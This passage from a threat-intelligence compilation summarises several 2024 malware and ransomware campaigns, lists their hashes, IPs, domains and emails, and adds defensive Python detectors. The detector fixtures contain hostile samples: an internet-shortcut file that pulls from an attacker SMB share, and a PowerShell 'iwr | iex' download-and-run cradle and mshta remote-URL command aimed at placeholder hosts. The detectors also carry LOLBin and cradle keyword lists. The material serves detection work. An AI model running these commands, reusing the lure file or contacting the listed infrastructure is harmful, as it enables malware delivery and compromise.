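# Opening it makes Windows fetch the target from the attacker's SMB share.
SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file://203.0.113.10/share/Invoice_Details.pdf.lnk
IconFile=\\203.0.113.10\share\icon.ico
IconIndex=1
"""

BENIGN_URL_FILE = "[InternetShortcut]\nURL=https://www.example.com/\n"

# file://host/... or \\host\... ; a local file:///C:/... has an empty host and does not match.
UNC_RE = re.compile(r"^(?:file://|\\\\)(?P<host>[^\\/]+)(?:[\\/]|$)", re.IGNORECASE)

def parse_url_file(text):
    """Return the fields of the [InternetShortcut] section that can reference a path
    (keys are lower-cased by configparser)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if "InternetShortcut" not in cp:
        return {}
    sec = cp["InternetShortcut"]
    return {k: sec[k] for k in ("url", "iconfile", "workingdirectory") if k in sec}

def remote_smb_targets(text):
    """(field, host) pairs for every field that points at a remote UNC/SMB location."""
    out = []
    for field, value in parse_url_file(text).items():
        m = UNC_RE.match(value.strip())
        if m:
            out.append((field, m.group("host")))
    return out

if __name__ == "__main__":
    print(remote_smb_targets(SAMPLE_URL_FILE))
    print(remote_smb_targets(BENIGN_URL_FILE))
```

IconFile is checked as well as URL because Explorer resolves the icon path as soon as the file is rendered in a folder listing, before the user opens anything. On the network side the same hosts should show up as outbound TCP/445 from workstations to the Internet, which is worth blocking at the perimeter regardless of this campaign.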
|
Analysis of APT-C-00 (OceanLotus) Double Loader and Related VMP Loader |
The report discusses recent attacks by APT-C-00 (OceanLotus), a state-sponsored group, and analyzes two loaders used in its 2024 campaigns: a double loader and a VMProtect-protected variant of it. The double loader consists of two modules, an MSVC-compiled DLL for initial information gathering and a Go DLL for payload execution. The VMP loader wraps the same double loader in VMProtect 3.XX (x64) to resist analysis. Both loaders ultimately deploy Cobalt Strike Beacon modules that talk to different C2 servers. The report highlights the group's use of several programming languages and of false-flag techniques to complicate attribution. |
Type |
Indicator |
FileHash-MD5 |
2109479e62f3c45bab00768553b158b8 |
FileHash-MD5 |
26669891d83b8a706d2c0af91292247c |
FileHash-MD5 |
4a8756b22029a88506744ab7864c9b83 |
FileHash-MD5 |
4ce5ea38c4d486bed7f6d9e9208133c6 |
FileHash-MD5 |
9ad37ce054ca1523d26bb49fbc80dff6 |
FileHash-MD5 |
d21c4b1c1db2c9f443c4ba271f738c91 |
IPv4 |
64.176.58.16 |
|
Kryptina RaaS - From Unsellable Cast-Off to Enterprise Ransomware |
This analysis examines the evolution of Kryptina, a ransomware-as-a-service platform, from a free tool on public forums to being actively used in enterprise attacks under the Mallox ransomware family. In May 2024, a Mallox affiliate leaked staging server data, revealing their Linux ransomware was based on a modified version of Kryptina. The affiliate made superficial changes to source code and documentation, removing Kryptina branding but retaining core functionality. This adoption exemplifies the commoditization of ransomware tools, complicating malware tracking as affiliates blend different codebases into new variants. The report details the similarities and differences between the original Kryptina RaaS and the modified Mallox version, including encryption methods, ransom note templates, and configuration files. |
Type |
Indicator |
FileHash-MD5 |
71efe7a21da183c407682261612afc0f |
FileHash-SHA1 |
0f1aea2cf0c9f2de55d2b920618a5948c5e5e119 |
FileHash-SHA256 |
45a236e7aa80515aafb6c656c758faad6e77fb435b35bfa407aef3918212078d |
CVE |
CVE-2024-21338 |
FileHash-MD5 |
1448ce8abc2f0184ec898d55f9c338b4 |
FileHash-MD5 |
193d2c42fea21defedbce498b5039272 |
FileHash-MD5 |
231478ff24055d5cdb5fbec36060c8ff |
FileHash-MD5 |
4825f3a92780be4a285583b0f24fed99 |
FileHash-MD5 |
51d51696c7f3a0e3fba4b8ceab210bac |
FileHash-MD5 |
5b0c1958a875c205951b88fd1c885900 |
FileHash-MD5 |
68785d476573955d50a3908dc18bf73b |
FileHash-MD5 |
6bb2752ea73b4d6a5c33f543b5c29461 |
FileHash-MD5 |
779aa15cd6a8d416e7f722331d87f47b |
FileHash-MD5 |
7f099845d8e6849d6ab4d64b546477d6 |
FileHash-MD5 |
846bb4f2cdbf9ed624ba2647c6b04101 |
FileHash-MD5 |
8d0fd41d35df82d3e7e2ff5c1747b87c |
FileHash-MD5 |
af1d24091758f1e02d51dc5f5297c932 |
FileHash-MD5 |
b0770b7f24a436d256f2d58fc8581a18 |
FileHash-MD5 |
b5b20e03ae941e9f21c444bd50225c41 |
FileHash-MD5 |
be08c3e95df5992903a69e04cbab22e3 |
FileHash-MD5 |
e9e087c52b97c7a3e343642379829e0a |
FileHash-SHA1 |
0b9d2895d29f7d553e5613266c2319e10afdda78 |
FileHash-SHA1 |
0bbd9a8ddbb68e2658ea4c0a4106c7406a392098 |
FileHash-SHA1 |
0de92527430dc0794694787678294509964422e6 |
FileHash-SHA1 |
0e83d023b9f6c34ab029206f1f11b3457171a30a |
FileHash-SHA1 |
0f632f8e59b8c8b99241d0fd5ff802f31a3650cd |
FileHash-SHA1 |
1379a1b08f938f9a53082150d53efadb2ad37ae5 |
FileHash-SHA1 |
16ec82ac2caf0c2e4812a636dbff4bd8ef84d5c3 |
FileHash-SHA1 |
21bacf8daa45717e87a39842ec33ad61d9d79cfe |
FileHash-SHA1 |
262497702d6b7f7d4af73a90cb7d0e930f9ec355 |
FileHash-SHA1 |
29936b1aa952a89905bf0f7b7053515fd72d8c5c |
FileHash-SHA1 |
2b3fc20c4521848f33edcf55ed3d508811c42861 |
FileHash-SHA1 |
341552a8650d2bdad5f3ec12e333e3153172ee66 |
FileHash-SHA1 |
43377911601247920dc15e9b22eda4c57cb9e743 |
FileHash-SHA1 |
55dc4541b72a804a7edf324d6a388569a68a2986 |
FileHash-SHA1 |
58552820ba2271e5c3a76b30bd3a07144232b9b3 |
FileHash-SHA1 |
5cf67c0a1fa06101232437bee5111fefcd8e2df4 |
FileHash-SHA1 |
66cab82b64fbb03fecf7ca7f9ed295404a9bfe2b |
FileHash-SHA1 |
78c27c7ac1da97dc822b4af7be5f15d68f9c5e4f |
FileHash-SHA1 |
88a039be03abc7305db724079e1a85810088f900 |
FileHash-SHA1 |
9050419cbecc88be7a06ea823e270db16f47c1ea |
FileHash-SHA1 |
93ef3578f9c3db304a979b0d9d36234396ec6ac9 |
FileHash-SHA1 |
a1a8922702ffa8c74aba9782cca90c939dfb15bf |
FileHash-SHA1 |
b07c725edb65a879d392cd961b4cb6a876e40e2d |
FileHash-SHA1 |
b27d291596cc890d283e0d3a3e08907c47e3d1cc |
FileHash-SHA1 |
b768ba3e6e03a77004539ae999bb2ae7b1f12c62 |
FileHash-SHA1 |
c20e8d536804cf97584eec93d9a89c09541155bc |
FileHash-SHA1 |
c4d988135e960e88e7acfae79a45c20e100984b6 |
FileHash-SHA1 |
d46fbc4a57dce813574ee312001eaad0aa4e52de |
FileHash-SHA1 |
d618a9655985c33e69a4713ebe39d473a4d58cde |
FileHash-SHA1 |
d94f890a8c92cbce50d89da2792bcfc24894c004 |
FileHash-SHA1 |
dc3f98dded6c1f1e363db6752c512e01ac9433f3 |
FileHash-SHA1 |
ee3cd3a749f5146cf6d4b36ee87913c51b9bfe93 |
FileHash-SHA1 |
ef2565c789316612d8103056cec25f77674d78d1 |
FileHash-SHA1 |
f17d9b3cd2ba1dea125d2e1a4aeafc6d4d8f12dc |
FileHash-SHA1 |
fbb89744bc9f65719bd5415dcf1ec9a74b24254e |
FileHash-SHA256 |
175e20a7c8d54bfa6271de9d550c25c21e1c91aaf39aaa80779389fc8600d53f |
FileHash-SHA256 |
23ba8078df63ebb313f2f2a2f24dab840e068ddd5cc54bb661db7d010954d2fc |
FileHash-SHA256 |
2fdaee89b426fa3ee00f3e8d10ebf23f1de1562746e5ba2ee606443572190610 |
FileHash-SHA256 |
3b1b1beacd0925dcb27675c45f50574921181c097ab8004d18bc116e5a99bde0 |
FileHash-SHA256 |
694eeec46cfe1b7acd54cf95b307416be984a5238b3059cc3af446e74e28d889 |
FileHash-SHA256 |
9195ad1b5c2d4b20b12958224c6913b6a7929c3c4d2648a552aa7dc92da9143b |
FileHash-SHA256 |
9f4c40c0d52291334d90455a64106f920ede3bda5c3f7d00b0933032b0f208d8 |
FileHash-SHA256 |
b7776fc59166d0fdafa0ff7ab867049512226b0d7302a3acd9532ab05e58d44b |
FileHash-SHA256 |
c23c25621872ef6a5f6a04dc1caf283a5efb3e046f6f721e96f661d28e3e6280 |
FileHash-SHA256 |
c714df0154f2b6fc8a82aa35281836c664bd3fbf4be3efc7e8b5b94ac87fc0a6 |
FileHash-SHA256 |
cd0f87f7df534b0e29b2ffa5d02cdef0d7db29a67a316e143554eb1945d75e6c |
FileHash-SHA256 |
e52a8d0337bae656b01cb76c03975ac3d75ac4984c028ba2a6531396dea6dddd |
FileHash-SHA256 |
e6d4e65c45700dcedd2b5ed73734328500b5f5a016d79440d3611092475b9e6e |
FileHash-SHA256 |
e9b9f425fa818899070f69d09d3a35d7ccc88de6ac98b2c8b02116f1b314bc78 |
FileHash-SHA256 |
ec1b3e6440b0fe1523295479fb18660aaac2f9f13a72145feebe07d60c2d9197 |
FileHash-SHA256 |
f4b64976d7dcb04466f0a89d81cd2eb158158c752c042ec248549415799965bf |
FileHash-SHA256 |
ff5e8c23e622bdaf6fd608691e6c3da298b0bfe867b0d8d84d37d991b75a237c |
IPv4 |
185.73.125.6 |
domain |
docs.md |
hostname |
grovik71.theweb.place |
|
How Ransomhub Ransomware Uses EDRKillShifter to Disable EDR and Antivirus Protections |
RansomHub ransomware, attributed to a group tracked as Water Bakunawa, relies on anti-EDR techniques to evade security solutions. Its attack chain includes exploiting vulnerabilities such as Zerologon (CVE-2020-1472), running EDRKillShifter to disable endpoint protection, and deploying assorted evasion scripts. The ransomware targets multiple industries and critical infrastructure sectors, using spear-phishing for initial access, NetScan for network reconnaissance, and AnyDesk for command and control. The attackers exfiltrate sensitive data with rclone before encrypting files and demanding a ransom. RansomHub's evolving tactics call for layered defenses against modern ransomware. |
Type |
Indicator |
IPv4 |
82.147.85.52 |
FileHash-MD5 |
0cd57e68236aaa585af75e3be9d5df7d |
FileHash-MD5 |
407dcc63e6186f7acada055169b08d81 |
FileHash-MD5 |
57556d30b4d1e01d5c5ca2717a2c8281 |
FileHash-MD5 |
676259a72f3f770f8ad20b287d62071b |
FileHash-MD5 |
da3ba26033eb145ac916500725b7dfd5 |
FileHash-MD5 |
de8e14fdd3f385d7c6d34b181903849f |
FileHash-MD5 |
f17ceae8c5066608b5c87431bac405a9 |
FileHash-MD5 |
ff1eff0e0f1f2eabe1199ae71194e560 |
FileHash-SHA1 |
189c638388acd0189fe164cf81e455e41d9629d6 |
FileHash-SHA1 |
2d3a95e91449a366ccf56177a4542cc439635768 |
FileHash-SHA1 |
2e89cf3267c8724002c3c89be90874a22812efc6 |
FileHash-SHA1 |
3b035da6c69f9b05868ffe55d7a267d098c6f290 |
FileHash-SHA1 |
4c0d755f42902559d16b73ccc4511897f7bbce94 |
FileHash-SHA1 |
5f2c7da181a0ef32df5b9c8a10ea5b3135489021 |
FileHash-SHA1 |
6764ddb2e5b18bf5d0c621f3078d7ac72865c1c3 |
FileHash-SHA1 |
77daf77d9d2a08cc22981c004689b870f74544b5 |
FileHash-SHA1 |
86cdb729094c013e411ac9b4c72485a55a629e5d |
FileHash-SHA1 |
8de2d38d33294586b4758599fdf65f1a265e013b |
FileHash-SHA1 |
bcdb721d5be41a9d61bee20a458ae748e023238f |
FileHash-SHA1 |
de1241a592760cc1d850be8f41beebcd460b66ec |
FileHash-SHA1 |
e187d58f59e0444f7ef9ddefec88d2b11b96e734 |
FileHash-SHA1 |
e38082ae727aeaef4f241a1920150fdf6f149106 |
FileHash-SHA256 |
2d823c8b6076e932d696e8cb8a2c5c5df6d392526cba8e39b64c43635f683009 |
FileHash-SHA256 |
30abbbeedeeb268435899a7697f7a72f37a38e60ae2430e09bc029c7a8aa7001 |
FileHash-SHA256 |
46ff164e066a3a88dad76cad25c6ea42c7da6890bcba3fa3ccd4c6e93a3272d0 |
FileHash-SHA256 |
869758de8334c2b201a07cfbfc0a903105a113080dde0355857de46b3eaae08e |
FileHash-SHA256 |
b2a2e8e0795b2f69d96a48a49985fb67d22d1c6e8b40dadd690c299b9af970d4 |
FileHash-SHA256 |
bd70882f67da03836f372172f655456ce19f95878d70ec39fcc6c059f9ef4ca0 |
FileHash-SHA256 |
bfbbba7d18be1aa2e85390fa69a761302756ee9348b7343af6f42f3b5d0a939c |
FileHash-SHA256 |
d9a8c4fc94655f47a127b45c71e426d0f2057b6faf78fb7b86ee2995f7def41d |
|
ReadText34 Ransomware Incident |
A ransomware attack was observed in September 2024 against an endpoint with limited telemetry coverage. The threat actor used stolen Administrator credentials to enable RDP and deploy malicious executables, then installed a vulnerable driver belonging to TrueSight RogueKiller Antirootkit to disable security applications (a bring-your-own-vulnerable-driver technique). The ransomware, named ReadText34, disabled system recovery options before encryption; the encryption itself was performed with the native Windows utility cipher.exe. The BianLian Go Trojan was used for command and control. A ransom note threatened to release stolen data unless the victim made contact within 72 hours. The incident highlights the importance of comprehensive endpoint monitoring, incident response planning, and attack surface reduction. |
Type |
Indicator |
FileHash-MD5 |
891202963430a4b1dea2dc5b9af01dc5 |
FileHash-SHA1 |
f7042cd7c363eb85fbb9d4b42b667de4acbff24e |
FileHash-SHA256 |
8368925651fefcd85e0e73790082b9a69237fa66225f932c2a44014cc356acdc |
FileHash-SHA256 |
90daac69da7201e4e081b59b61ca2a2116772318621c430f75c91a65e56ea085 |
FileHash-SHA256 |
ac66828fbdf661d67562da5afb7cc8f55d9a8739ab1524e775d5dcebfc4de069 |
IPv4 |
94.198.50.195 |
email |
ithelp15@securitymy.name |
email |
ithelp15@yousheltered.com |
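Both the RansomHub report above and this one describe the same move: load a legitimately signed but vulnerable driver, then use it to kill the security agent. Because the driver is signed, the useful telemetry is where it loaded from, whether its hash is on an abused-driver blocklist, and what dies in the minutes after it loads. The following added example (not code from either report) applies those three checks to constructed Sysmon DriverLoad (Event ID 6) and ProcessTerminate (Event ID 5) records; the driver path, hashes, blocklist entry, process names and the two-minute window are all placeholders and assumptions.

```python
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed Sysmon Event ID 6 (DriverLoad) records. The hash values and the entry in
# KNOWN_ABUSED_SHA256 are placeholders, not indicators from either report.
DRIVER_LOADS = [
    {"UtcTime": "2024-09-12 03:14:05", "ImageLoaded": r"C:\Windows\System32\drivers\ndis.sys",
     "Hashes": "SHA256=" + "00" * 32, "Signed": "true", "Signature": "Microsoft Windows"},
    {"UtcTime": "2024-09-12 03:20:41", "ImageLoaded": r"C:\ProgramData\drv\antirootkit.sys",
     "Hashes": "SHA256=" + "a1" * 32, "Signed": "true", "Signature": "Some Vendor Ltd"},
]
# Constructed Sysmon Event ID 5 (ProcessTerminate) records.
PROCESS_TERMINATIONS = [
    {"UtcTime": "2024-09-12 03:20:52", "Image": r"C:\Program Files\EDR\edr_agent.exe"},
    {"UtcTime": "2024-09-12 07:00:00", "Image": r"C:\Windows\System32\notepad.exe"},
]

KNOWN_ABUSED_SHA256 = {"a1" * 32}   # placeholder; populate from a vulnerable-driver blocklist
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\temp\\")
SECURITY_PRODUCT_MARKERS = ("edr", "msmpeng", "sense", "antivirus", "defender")  # assumed naming

def parse_hashes(field):
    """'SHA256=ab..,MD5=cd..' -> {'SHA256': 'ab..', 'MD5': 'cd..'}"""
    return dict(part.split("=", 1) for part in field.split(",") if "=" in part)

def driver_load_reasons(ev):
    """Why a driver load is suspicious. Note that a valid signature is expected in
    BYOVD and is deliberately not treated as reassuring."""
    reasons = []
    path = ev["ImageLoaded"].lower()
    sha256 = parse_hashes(ev["Hashes"]).get("SHA256", "").lower()
    if sha256 in KNOWN_ABUSED_SHA256:
        reasons.append("hash is on the abused-driver blocklist")
    if path.startswith(USER_WRITABLE):
        reasons.append("loaded from a user-writable directory")
    if ev.get("Signed", "").lower() != "true":
        reasons.append("driver is unsigned")
    return reasons

def suspicious_driver_loads(events):
    return [(ev, r) for ev in events if (r := driver_load_reasons(ev))]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def security_kills_after_driver_load(driver_events, terminations, window=timedelta(minutes=2)):
    """Pair each suspicious driver load with security-product processes that
    terminated within `window` after it: the signature of an EDR-killer in action."""
    pairs = []
    for ev, _ in suspicious_driver_loads(driver_events):
        t0 = _ts(ev["UtcTime"])
        for term in terminations:
            name = PureWindowsPath(term["Image"]).name.lower()
            t1 = _ts(term["UtcTime"])
            if t0 <= t1 <= t0 + window and any(m in name for m in SECURITY_PRODUCT_MARKERS):
                pairs.append((ev["ImageLoaded"], term["Image"]))
    return pairs

if __name__ == "__main__":
    for ev, reasons in suspicious_driver_loads(DRIVER_LOADS):
        print(ev["ImageLoaded"], reasons)
    print(security_kills_after_driver_load(DRIVER_LOADS, PROCESS_TERMINATIONS))
```

Prevention sits one layer below this: the Microsoft vulnerable driver blocklist (enforced through HVCI or WDAC) refuses the load outright, and the hunt above is the fallback for hosts where that policy is not in audit-free enforcement. Feed the blocklist from a maintained source rather than the placeholder set here.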
|
Uncovering ICICI Phishing Campaign: New Fraud App Found |
A malicious host mimicking ICICI Bank has been discovered, along with a fraudulent app disguised as ICICI Helpdesk. The phishing domain, cppcccare.com, is hosted on an ASN known for various malicious activities. The fraudulent app, named 'ICICI.apk', is detected as a Trojan Banker, Keylogger, and SMSspy. It's believed to have been operational since August 2024, with a falsely inflated download count of 500K+. The app's description matches other fraudulent apps, indicating a broader phishing campaign. The incident has been reported to the bank, hosting provider, and CERT-IN authorities. The article provides detailed technical information about the malicious domain and app, including file hashes and package details. |
Type |
Indicator |
FileHash-MD5 |
df1e45aa0435509d552602ca1b84ccb6 |
FileHash-SHA1 |
bde9068c2deb1e3dcf9b7646dc8960dbea97d8b3 |
FileHash-SHA256 |
cd89b4cc7dc155f30db39e31b30894ed11f3fb6ad0fe5b2d014b123e333084c6 |
IPv4 |
77.37.34.191 |
domain |
cppcccare.com |
|
Behind the CAPTCHA: A Clever Gateway of Malware |
An infection chain dubbed ClickFix uses fake CAPTCHA pages to distribute Lumma Stealer. The campaign reaches multiple countries through two main vectors: download URLs for cracked games and phishing emails impersonating GitHub. The page silently copies a command to the victim's clipboard and instructs them to paste and run it as a "verification" step, which fetches and installs the malware. The chain uses several layers of encryption and launches its payload through mshta, a signed Windows binary, to evade detection. Mitigations include user education, robust email filtering, and keeping systems updated. The global reach and deceptive tactics highlight the evolving nature of cyber threats. |
Type |
Indicator |
FileHash-SHA256 |
b6a016ef240d94f86e20339c0093a8fa377767094276730acd96d878e0e1d624 |
FileHash-SHA256 |
cc29f33c1450e19b9632ec768ad4c8c6adbf35adaa3e1de5e19b2213d5cc9a54 |
FileHash-SHA256 |
632816db4e3642c8f0950250180dfffe3d37dca7219492f9557faf0ed78ced7c |
FileHash-SHA256 |
19d04a09e2b691f4fb3c2111d308dcfa2651328dfddef701d86c726dce4a334a |
FileHash-SHA256 |
d737637ee5f121d11a6f3295bf0d51b06218812b5ec04fe9ea484921e905a207 |
FileHash-SHA256 |
bbf7154f14d736f0c8491fb9fb44d2f179cdb02d34ab54c04466fa0702ea7d55 |
FileHash-SHA256 |
fa58022d69ca123cbc1bef13467d6853b2d55b12563afdbb81fc64b0d8a1d511 |
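The ClickFix step leaves a distinctive process tree: the pasted command runs a signed script host (mshta, PowerShell) as a direct child of explorer.exe with a remote URL on its command line. The following added example (not code from the report) scores constructed process-creation events on exactly those properties; the field names follow Sysmon Event ID 1, and the hosts, paths and keyword lists are assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (subset of Sysmon Event ID 1 fields);
# hosts and paths are placeholders.
EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://203.0.113.20/captcha/verify.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://203.0.113.20/a.txt | iex"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe",
     "CommandLine": r"mshta C:\Program Files\Vendor\setup.hta"},
]

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "curl.exe"}
SHELL_PARENTS = {"explorer.exe"}   # the Win+R Run dialog starts commands as children of explorer.exe
# http(s) URL or a UNC path (\\host\share\...) anywhere in the command line
REMOTE_RE = re.compile(r"https?://\S+|\\\\[\w.-]+\\\S+", re.IGNORECASE)
# PowerShell download/execute cradle keywords, bounded so -ep or iexplore do not match
CRADLE_RE = re.compile(
    r"(?<![\w-])(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression"
    r"|frombase64string|-e(?:nc|ncodedcommand)?)(?![\w-])",
    re.IGNORECASE,
)

def clickfix_signals(ev):
    image = PureWindowsPath(ev["Image"]).name.lower()
    parent = PureWindowsPath(ev["ParentImage"]).name.lower()
    cmd = ev["CommandLine"]
    return {
        "lolbin": image in LOLBINS,
        "shell_parent": parent in SHELL_PARENTS,
        "remote": bool(REMOTE_RE.search(cmd)),
        "cradle": bool(CRADLE_RE.search(cmd)),
    }

def is_clickfix_candidate(ev):
    """A script host pulling from a remote location, launched by the user's shell or
    carrying cradle keywords. Installer-spawned local .hta files do not qualify."""
    s = clickfix_signals(ev)
    return s["lolbin"] and s["remote"] and (s["shell_parent"] or s["cradle"])

def detect(events):
    return [ev["CommandLine"] for ev in events if is_clickfix_candidate(ev)]

if __name__ == "__main__":
    for cmd in detect(EVENTS):
        print("ClickFix candidate:", cmd)
```

The third event is the false-positive guard: vendors do ship .hta installers, but they run from a local path under an installer parent, not from explorer.exe with a URL. Where the Run dialog is not needed, the surest prevention is the RunMRU-disabling policy and a WDAC rule that blocks mshta.exe for standard users.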
|
Unmasking MuddyWater's Multiple RMM Software Attacks |
MuddyWater, a threat group active since 2017, has been using a range of Remote Monitoring and Management (RMM) software in attacks, particularly in the Middle East. Spear-phishing emails carrying malicious attachments or links lead to the installation of RMM tools such as Atera Agent, ScreenConnect, Remote Utilities, N-able, Syncro, and SimpleHelp; these legitimate tools are then abused for remote access and control of victim systems. The attacks are characterized by Arabic-language lures, delivery through file-sharing services, and a consistent deployment process. MuddyWater primarily targets the government, military, and energy sectors and maintains a large arsenal of attack tools alongside evasion techniques. |
Type |
Indicator |
FileHash-MD5 |
04afff1465a223a806774104b652a4f0 |
FileHash-MD5 |
146cc3a1a68be349e70b79f9115c496b |
FileHash-MD5 |
1e9a4e774b61acc8a6b35ee50417e661 |
FileHash-MD5 |
1f0b9aed4b2c8d958a9b396852a62c9d |
FileHash-MD5 |
23d99f912f2491749b89e4fd337273bc |
FileHash-MD5 |
242098c3e87822bffa7c337987065fbe |
FileHash-MD5 |
244a4f81cff4a8dc5872628a40713735 |
FileHash-MD5 |
24c72ffef74be81c5a7d4cb024110328 |
FileHash-MD5 |
2cd569dafe4f537150f0416b021c30ab |
FileHash-MD5 |
387fd14f5a89ec121c4c2c989063822f |
FileHash-MD5 |
3c1b429685e5f1853a3cd955bd0acbd7 |
FileHash-MD5 |
4055d8b5c2e909f5db8b75a5750a7005 |
FileHash-MD5 |
473dfccda44f85d119aadefb92cd085e |
FileHash-MD5 |
5d013b96a25f0610cd1ac45d61d44d7e |
FileHash-MD5 |
5d61614099d6d567441d15c58d6517b0 |
FileHash-MD5 |
64fc017a451ef273dcacdf6c099031f3 |
FileHash-MD5 |
66fddebf896a5631172436b740c06ad1 |
FileHash-MD5 |
6bc591f4e8eb1ea54b4d6defd019bee8 |
FileHash-MD5 |
71ffc9ebbb80f4e2f405034662dfd424 |
FileHash-MD5 |
7aeb1fe9ab3efffcf390eadaff696411 |
FileHash-MD5 |
7ce27d43bdbb6c9238c5d367a86dc37b |
FileHash-MD5 |
7ed44b36850a5f192fb56768669d8090 |
FileHash-MD5 |
809334c0b55009c5a50f37e4eec63c43 |
FileHash-MD5 |
83044ce990501559e34f5a64318778a8 |
FileHash-MD5 |
8b50f74907810cf23507b5bd8d83f13c |
FileHash-MD5 |
8d2199fa11c6a8d95c1c2b4add70373a |
FileHash-MD5 |
8e5ba70473c66334ced67ac3be9970e0 |
FileHash-MD5 |
93be13bbcad30440a0d0ef3868d67003 |
FileHash-MD5 |
960594cbdf938bcb03bd0637843d9154 |
FileHash-MD5 |
a2571577f281eda9548d9047b37cbbb8 |
FileHash-MD5 |
a85460ff7d12ccc2b82da8143ac1f594 |
FileHash-MD5 |
a8fce1e8e89053e143b5431cfa5209cb |
FileHash-MD5 |
aaa9db79b5d6ba319e24e6180a7935d6 |
FileHash-MD5 |
aba760ec55fdeccb35adb068443feb89 |
FileHash-MD5 |
ad4ce3a58db27f40e17abf633e319efe |
FileHash-MD5 |
b181ecbb7394e3b1394a8c97af65b7e2 |
FileHash-MD5 |
b9cff91be734e2a071d3b0fc07dc8386 |
FileHash-MD5 |
c381c2cb8fdd6acf1636280b9424f573 |
FileHash-MD5 |
c4a88707bba871a667004a4a27de6785 |
FileHash-MD5 |
c5a737a346e0a83082b924712926af7d |
FileHash-MD5 |
c67d578a14571e4f56430ce4bdc228f9 |
FileHash-MD5 |
cdeb7abfc7775c63745135431272dda3 |
FileHash-MD5 |
d16bb327c655ac5e52c9452cedb369da |
FileHash-MD5 |
d1b4ca2933f49494b4400d5bf5ab502e |
FileHash-MD5 |
dd247ccd7cc3a13e1c72bb01cf3a816d |
FileHash-MD5 |
de578308ac3403ae9e88616b8a292383 |
| Type | Indicator |
| --- | --- |
| FileHash-MD5 | e8e84ac1ae83a45c260df146e97cb1cb |
| FileHash-MD5 | e8f3ecc0456fcbbb029b1c27dc1faad0 |
| FileHash-MD5 | eb0bba584138044e2d051deab69a57f1 |
| FileHash-MD5 | ef6ec560efd05d21976a6fd3f489e206 |
| FileHash-MD5 | f1c935ce028022ab2a495eae83adacc6 |
| FileHash-MD5 | fa55d4fe55eb4b9b34804d94bcd2f88f |
| FileHash-MD5 | fa6d5164772ba72dc3931dae8e09b488 |
| FileHash-SHA1 | 03188d5ee44005b1b0e2ed62c943cd8571ab8ee2 |
| FileHash-SHA1 | 0467a0dd4f9e92d54e3d059aed49f282f2ccf40e |
| FileHash-SHA1 | 09a73164c70426372b431cba80510037eb42feb9 |
| FileHash-SHA1 | 0f5c2ebbf2edc7d25ea72437b5f5b2245fcffacf |
| FileHash-SHA1 | 0fc0e1ab30f55d1709532496ac6adac107a4729e |
| FileHash-SHA1 | 116646a11967c1eed0e6072150b8d581bcf8d6a5 |
| FileHash-SHA1 | 11b14763023772cc2eebfa306aef0c9e946b491b |
| FileHash-SHA1 | 18a6ee322f30fe17f896686fbc162e4c8d628e5a |
| FileHash-SHA1 | 1dd0301a120d6cbed1d22b9d1fb8c9d3d6793546 |
| FileHash-SHA1 | 21966155675a407ba199561cf245e9e2858026bf |
| FileHash-SHA1 | 2319cbf50ff858b66aa36b27a78ac7ef89a6d17a |
| FileHash-SHA1 | 24b60847bc0712c9ba0b8036c59ee16c211fa8bb |
| FileHash-SHA1 | 2f7056621e1a8ecb20a7639635d403e2c44e6135 |
| FileHash-SHA1 | 3cf40758a15faf5037a7fcb6c8d6c322ec54dfc1 |
| FileHash-SHA1 | 3e6f2c6ef018528dc65b97331f3ce745b3c386a0 |
| FileHash-SHA1 | 41f2e6fe3a26cfad586fa4c7682d0a815567a1a4 |
| FileHash-SHA1 | 4d26a7a2a3b6900050dba6058b2797bfa1ce1102 |
| FileHash-SHA1 | 53ce7a2850e27465f3aae3cc2fae1a3ec1b6a640 |
| FileHash-SHA1 | 69f68529e07f2463eb105cfc87df04539e969a56 |
| FileHash-SHA1 | 6aa8b4f4a6fd1b4f768b1ac6faaaddbaa302a585 |
| FileHash-SHA1 | 6fb8b0e4e31f678f53b22e7b8a1b70f0deef1545 |
| FileHash-SHA1 | 707c251833db0fb7c17c79413ddaebcb54cdb0fc |
| FileHash-SHA1 | 71093d587278185fd831783acb2a97444ad661d8 |
| FileHash-SHA1 | 77430cca36ee983dc17ca47efe9faa608effcef8 |
| FileHash-SHA1 | 7918e2c9c6f2847078bb736968f8f21b7e70a0af |
| FileHash-SHA1 | 8103cbffd4f7651c32a1cc602f0398027fb3207f |
| FileHash-SHA1 | 81c06183b1bb146f5f1a5f1d03ac44fa9d68d341 |
| FileHash-SHA1 | 81caea574f890dd6d25a95d04ae6e2d4ff7222d7 |
| FileHash-SHA1 | 94feda1c4059291a7e00fbe5435291017caf55fc |
| FileHash-SHA1 | 9543cab61c330e533bcdd92ed6e1012f1b284d10 |
| FileHash-SHA1 | a65d4b46ba7fcb3b023f61303e65f0c494b63386 |
| FileHash-SHA1 | a76b7579c217ce45f9c257b4a3617cfcd63c3212 |
| FileHash-SHA1 | b7522d2f1fb7b9b92348b4d88c62480683d3485c |
| FileHash-SHA1 | b9a0277465cc427191942fb0e9ae76c83ba84d3e |
| FileHash-SHA1 | bb8647eeaf1acadbb2aa7d67222d4ab8054ac645 |
| FileHash-SHA1 | bdc8c0a03b3430af66895b5c6f03da00916447ca |
| FileHash-SHA1 | c4f00531020b8f7cc865fe26c6e31e358e666831 |
| FileHash-SHA1 | c58370b4114d4d493e141a66cd1484573ccf02b5 |
| FileHash-SHA1 | cc7afffdb88729a5e977fa8f75a898d09624f54a |
| FileHash-SHA1 | cf8ad0da6dc45ae7ce87f792b1e60175cefc2b50 |
| FileHash-SHA1 | d005ebee72feb5ac50ee81e872665cae32d6c1c9 |
| FileHash-SHA1 | dfe1f455adf8a98d94c7217acc763770ada4b4af |
| FileHash-SHA1 | f228e772a31b4fc160cb59cf5627224613f10941 |
